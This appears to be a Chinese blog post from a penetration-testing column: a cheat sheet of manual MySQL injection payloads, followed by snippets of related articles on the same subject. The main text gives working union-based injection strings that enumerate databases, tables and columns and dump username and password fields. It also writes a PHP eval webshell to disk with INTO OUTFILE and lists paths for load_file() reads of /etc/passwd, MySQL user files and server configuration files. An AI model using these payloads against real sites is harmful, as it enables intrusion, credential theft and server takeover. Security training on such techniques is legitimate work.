MySQL 手工注入常用语句

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量4.1w 收藏 7
点赞数
分类专栏: 渗透

判断是否存在SQL注入

'
and 1=1
and 1=2

暴字段长度

Order by 数字

匹配字段

and 1=1 union select 1,2,..,n

暴字段位置

and 1=2 union select 1,2,..,n

利用内置函数暴数据库信息

version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() 
and 1=2 union all select database() 
and 1=2 union all select user()

操作系统信息:

and 1=2 union all select @@global.version_compile_os from mysql.user

数据库权限:

and ord(mid(user(),1,1))=114  返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1

暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法(一个可用字段显示两个数据内容):

Union select 1,2,3,concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件:

1、知道站点物理路径

2、有足够大的权限(可以用select …. from mysql.user测试)

3、magic_quotes_gpc()=OFF

select ‘<?php eval_r($_POST[cmd])?>' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'

load_file() 常用路径:

  1. replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
  2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
    上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成”空格” 返回的是网页.而无法查看到代码.
  3. load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
  4. /etc tpd/conf tpd.conf/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
  5. c:\Program Files\Apache Group\Apache\conf \httpd.confC:\apache\conf \httpd.conf查看WINDOWS系统apache文件
  6. c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
  7. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
  8. d:\APACHE\Apache2\conf\httpd.conf
  9. C:\Program Files\mysql\my.ini
  10. ../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
  11. c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
  12. /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
  13. /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  14. /usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
  15. /etc/sysconfig/iptables 本机防火墙策略
  16. usr/local/app/php5 b/php.ini PHP 的相当设置
  17. /etc/my.cnf MYSQL的配置文件
  18. /etc/redhat-release 红帽子的系统版本
  19. C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
  20. /etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
  21. /usr/local/app/php5 b/php.ini //PHP相关设置
  22. /usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
  23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
  24. c:\windows\my.ini
  25. c:\boot.ini

网站常用配置文件 

config.inc.php、config.php

load_file()时要用replace(load_file(HEX),char(60),char(32))

注:

Char(60)表示 <
Char32)表示 空格

手工注射时出现的问题:

当注射后页面显示:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

如:

/instrument.php?ID=13 and 1=2 union select 1,load_file(0x433A5C626F6F742E696E69),3,4,user()

这是由于前后编码不一致造成的,

解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:

/instrument.php?ID=13 and 1=2 union select 1,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))
绝不原创的飞龙
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入语句 爆表_mysql注入语句
weixin_42361635的博客
02-04 834
一、sql注入语句爆破所有数据库:(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:(select ...
MySQL手工注入入门
L_KevinK的博客
08-01 308
MySQL手工注入入门————简单实例(1)测试注入点是否可用(2)猜表字段数(3)使用联合查询,爆出显示位(4)查询数据库信息(5)查询相关数据表(6)查询、猜解表中字段(6)查询字段内容 (1)测试注入点是否可用 常用方法: (1)链接后加单引号看页面是否报错 (2)链接后分别加 and 1=1 与 and 1=2 看返回页面是否有差异 实例测试: 1)链接后加 ’ 返回页面错误 ...
Mysql注入
天天学安全专属博客
10-28 4248
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 837
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql 手工注入语句总结_[总结]SQL手工注入总结
weixin_28783937的博客
01-27 317
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!0x01 Mysql 手工注入1.1 联合注入?id=1' order by 4--+?id=0' union select 1,2...
mysql 注入语句_MYSQL注入语句
weixin_33007509的博客
01-18 1161
一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限。MYsql 5.X以上版本的注入查询主要基于information_schem1.UNION 注入 (联合查询注入) ≥ MySQL 5 information_schema (信息数据库),其中保存着关于 My...
SQL注入MYSQL基础语句(持续更新)附图
weixin_44431280的博客
03-19 5582
SQL注入mysql基础语句 简介:常见的Web安全漏洞中,SQL注入利用和危害极大,通过其可以直接获取数据表的内容,从而获得Web站点的账号和密码,在学习SQL注入时,我们需要先对常见的数据库基础进行学习和了解。 MYSQL基础语句 一:数据库操作 1,在当前数据库管理系统中创建/删除数据库:create/drop dadabase websec; 2,查看当前数据库管理系统下所有数据库:show databases; 3,使用(进入)操作的数据库,use websec; 二:数据表操作 1,创建数据
SQL注入-MySQL手工注入语法大全
qq_41579182的博客
09-29 582
判断是否存在SQL注入 ’ and 1=1 and 1=2 暴字段长度 Order by 数字 匹配字段 and 1=1 union select 1,2,…,n 暴字段位置 and 1=2 union select 1,2,…,n 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、MySQL 注入原理 用户输入的内容被当作 SQL 语句来执行。攻击者可以通过构造特殊的输入来inject恶意的 SQL 代码,使得...
PHP+MySQL 手工注入语句大全 推荐
12-18
以下是一些常用的PHP+MySQL手工注入语句及其原理: 1. **暴字段长度**: `Order by num/*` 是一种尝试确定列数的方法,通过改变`num`的值来观察页面布局的变化,从而推测出列的数量。 `and 1=1 union select 1,2,...
php手工注入.doc
06-22
常用的PHP手工注入技巧包括: 1. **信息收集**:使用`version()`、`database()`和`user()`等函数来获取数据库版本、当前数据库名以及数据库用户名。在这个案例中,确定了数据库版本为5.0.51a-community,数据库名为...
SQL注入漏洞挖掘.pptx
10-27
手工测试是指攻击者手动构造测试语句,并分析返回结果,以判断是否存在 SQL 注入漏洞。手工测试的优点是灵活性高,测试范围广泛,但缺点是效率低,需要攻击者的技术水平高。 自动化测试是指使用工具来自动构造测试...
spring mvc + mybitis + mysql集成例子,带数据库
07-20
Spring MVC、MyBatis 和 MySQL 是企业级 Java 开发中常用的三大技术栈,它们共同构建了一个灵活、高效且易于维护的Web应用后端框架。在这个集成例子中,Spring MVC 负责处理HTTP请求和视图渲染,MyBatis 作为持久层...
Mysql注入_基础
ccz4854的博客
04-27 1410
Mysql注入类型 union 联合查询 布尔盲注 时间盲注 显错注入 堆叠注入 宽字节注入 (只存在PHP) Mysql各类型注入语句 1.union 联合查询(sql查询语句),存在mysql的版本问题 下方是5.0之后版本的利用方式 5.0之后的版本存在 information_schema 表 :information_schema 是 一个虚拟数据库 information_schema数据库类似与“数据字典”,提供了访问数据库元数据的方式,即数据的数据。 如数据库名或表名,列类型,访问权
SQL注入语句
热门推荐
大头的博客
07-25 3万+
一、SQL注入语句 账号:Admin 密码:123456 登录验证语句为select * from 表名 where UserName = '用户名' and UserPassword = '用户密码";的系统可通过以下注入方式可能可绕过密码登录进入系统。 1、 Admin' or '1'='1 123(任意密码) 注释:形成一个恒为真的条件,是SQL查询判断失败 2、 Admi...
MongoDB Shell使用
u013310037的博客
10-09 763
MongoDB Compass的启动: mongodb-compass 单击MongoDB Compass下方的 MongoSH Beta,从而启动MongoDB Shell:
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2096
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
MySQL手工注入
xiao_he0123的博客
03-16 3477
MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据 前言 此次文章建立在MySQL数据库的基础上 一、SQL注入的原理 可控变量带入数据库查询,变量未存在过滤或者过滤不完整 二,如何判断是否有注入点 and 1=1页面正常 and 1=2页面错误则表明有注入点 同时也可以对参数随意赋值判断如果
手工sql注入常用sql语句
05-10
以下是常用手工SQL注入语句: 1. 判断版本号 ```sql SELECT @@VERSION ``` 2. 列出当前数据库中的所有表 ```sql SELECT table_name FROM information_schema.tables WHERE table_schema=database() ``` 3. 列出指定表中的所有列 ```sql SELECT column_name FROM information_schema.columns WHERE table_name='table_name' ``` 4. 获取当前用户 ```sql SELECT user() ``` 5. 获取当前数据库名 ```sql SELECT database() ``` 6. 获取当前登录用户的密码哈希值 ```sql SELECT password FROM mysql.user WHERE user='current_user' ``` 7. 获取当前数据库版本 ```sql SELECT @@version ``` 8. 查询指定表中的前N条记录 ```sql SELECT * FROM table_name LIMIT N ``` 9. 获取当前数据库的所有用户 ```sql SELECT DISTINCT User FROM mysql.user ``` 10. 列出当前数据库中所有存储过程 ```sql SELECT name FROM mysql.proc WHERE db = 'current_database' ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值